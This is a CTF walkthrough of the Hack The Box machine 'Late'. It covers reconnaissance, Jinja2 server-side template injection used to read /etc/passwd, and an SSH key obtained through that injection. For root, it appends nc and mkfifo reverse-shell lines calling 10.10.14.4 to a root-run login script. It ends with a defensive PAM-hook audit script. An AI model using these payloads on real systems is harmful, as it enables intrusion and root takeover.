Hack The Box Late Walkthrough
Late
Initial recon
Machine IP: 10.10.11.156
NMAP Scan
List of open ports:
$ sudo nmap 10.10.11.156 -p- -T5 -sSVC -oA Late/late_full_nmap
Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-30 10:43 UTC
Warning: 10.10.11.156 giving up on port because retransmission cap hit (2).
Nmap scan report for 10.10.11.156
Host is up (0.098s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 02:5e:29:0e:a3:af:4e:72:9d:a4:fe:0d:cb:5d:83:07 (RSA)
| 256 41:e1:fe:03:a5:c7:97:c4:d5:16:77:f3:41:0c:e9:fb (ECDSA)
|_ 256 28:39:46:98:17:1e:46:1a:1e:a1:ab:3b:9a:57:70:48 (ED25519)
80/tcp open http nginx 1.14.0 (Ubuntu)
|_http-title: Late - Best online image tools
|_http-server-header: nginx/1.14.0 (Ubuntu)
51656/tcp filtered unknown
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 169.39 seconds
There are only two open ports, 22 and 80: SSH and HTTP.
SSH alone is unlikely to give us anything, so let's start with the HTTP port.
Website
Navigation
By scrolling through the website and hovering over the hyperlink “late free online photo editor”, we can see a subdomain: images.late.htb. Let's add it to the hosts file.
When we browse to http://images.late.htb, we land on a page titled “Convert image to text with Flask”.
The functionality takes a photo as input. The output is stored in a file called “result.txt”, which contains some HTML corresponding to the text present in the picture.
Flask
Flask renders its pages with Jinja2 templates, which makes it a classic candidate for SSTI (Server-Side Template Injection). SSTI is possible when user input is injected into a template directive, which can then execute arbitrary code on the server. We can test for it with a simple payload:
- {{7*7}}
If the server is vulnerable to SSTI, the output should be <p>49</p>.
We write our payload in a file, take a picture of it, and feed it to the Image Reader functionality. We then grab the result.txt file containing our output:
First access to the server
The server is vulnerable to SSTI. We now have to craft a payload that exploits it. The first payload we use reads the “/etc/passwd” file:
{{ get_flashed_messages.__globals__.__builtins__.open("/etc/passwd").read() }}
And it works!
We can see a user here: svc_acc. We can grab the “user.txt” file at “/home/svc_acc/user.txt”:
By listing its home directory, we find a “.ssh” folder containing an “id_rsa” file, i.e. a private SSH key.
We chmod the id_rsa key to 600, and with ssh -i id_rsa svc_acc@10.10.11.156
we can connect to the server over SSH.
Escalation to root
Enumeration
Now that we are connected as the user svc_acc, we need to find our way to root. We will let “linpeas.sh” enumerate the machine for us; let's run it and grab a cup of coffee.
After a few minutes of execution and parsing of the output, one file looks interesting:
This file contains a script that emails the root user about connections to the SSH server:
#!/bin/bash
RECIPIENT="root@late.htb"
SUBJECT="Email from Server Login: SSH Alert"
BODY="
A SSH login was detected.
User: $PAM_USER
User IP Host: $PAM_RHOST
Service: $PAM_SERVICE
TTY: $PAM_TTY
Date: `date`
Server: `uname -a`
"
if [ ${PAM_TYPE} = "open_session" ]; then
echo "Subject:${SUBJECT} ${BODY}" | /usr/sbin/sendmail ${RECIPIENT}
fi
At this point we have no idea whether this script actually runs on the server. We run pspy to confirm that the script is used. At first we thought the script wasn't run at all; then we remembered that it watches the SSH server and emails root to log every connection. We logged in again and saw:
Exploitation
The idea is then to add code to the script and trigger a reverse shell, as root this time. But we can't edit the file to add our payload. I tried many things, but the manipulation that worked was to echo my payload and redirect the output into the file:
echo "nc 10.10.14.4 1337 -e /bin/bash" >> /usr/local/sbin/ssh-alert.sh
This doesn't work: the creator of this machine installed a version of netcat that doesn't support the “-e” parameter. We then use the FIFO technique from this cheat sheet:
Our final payload is then :
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.4 1337 > /tmp/f
We fire up pwncat-cs listening on port 1337 and connect over SSH as svc_acc. This triggers the bash script and executes our payload.
Bim Bam Boom, rooted !
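The root cause here is a login hook executed by root that an unprivileged user could append to. As a defensive counterpart, the following added example (not from this writeup or the machine) audits every script that PAM runs through pam_exec.so and flags ownership and permissions that would allow exactly that. It assumes the alert script is wired in via pam_exec.so (the PAM_* variables suggest so, but the writeup does not show the PAM configuration) and that the command is the first absolute path on the line.

```python
"""Audit the login hooks PAM runs through pam_exec.so (added example; assumes
the ssh-alert script is registered via pam_exec.so, which the writeup does not show)."""
import os
import re
import stat
from pathlib import Path

PAM_DIR = "/etc/pam.d"  # Debian/Ubuntu default
PAM_EXEC = re.compile(r"pam_exec\.so(?P<args>.*)")
WRITABLE_BY_OTHERS = stat.S_IWGRP | stat.S_IWOTH

def parse_pam_exec(lines):
    """Script paths named on pam_exec.so lines; '#' comments are ignored. Options
    (seteuid, quiet, log=..., type=...) precede the command, so take the first absolute path."""
    paths = []
    for raw in lines:
        m = PAM_EXEC.search(raw.split("#", 1)[0])
        if m:
            cmd = next((t for t in m.group("args").split() if t.startswith("/")), None)
            if cmd:
                paths.append(cmd)
    return paths

def assess(mode, uid, parent_mode=0o40755, parent_uid=0):
    """Findings for a hook, given stat() mode/owner of it and of its directory.
    Each lets a non-root user change what root executes at login (the page's hook is case two)."""
    findings = []
    if uid != 0:
        findings.append("script not owned by root")
    if mode & WRITABLE_BY_OTHERS:
        findings.append("script writable by group/other (can be appended to or rewritten)")
    if parent_uid != 0 or (parent_mode & WRITABLE_BY_OTHERS and not parent_mode & stat.S_ISVTX):
        findings.append("parent directory allows replacing the script")
    return findings

def audit(pam_dir=PAM_DIR):
    report = {}  # script path -> findings list, or None when the file is missing
    for cfg in sorted(p for p in Path(pam_dir).glob("*") if p.is_file()):
        for script in parse_pam_exec(cfg.read_text(errors="replace").splitlines()):
            try:
                st, pst = os.stat(script), os.stat(os.path.dirname(script))
            except OSError:
                report[script] = None  # referenced but absent: dangling hook
                continue
            report[script] = assess(st.st_mode, st.st_uid, pst.st_mode, pst.st_uid)
    return report

if __name__ == "__main__":
    for script, findings in audit().items():
        print(script, "missing" if findings is None else ", ".join(findings) or "ok")
```

Run it as root so every referenced script can be stat()ed; a hook that reports "ok" is root-owned, not writable by anyone else, and sits in a directory others cannot modify.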
Thank you for reading.
Libereau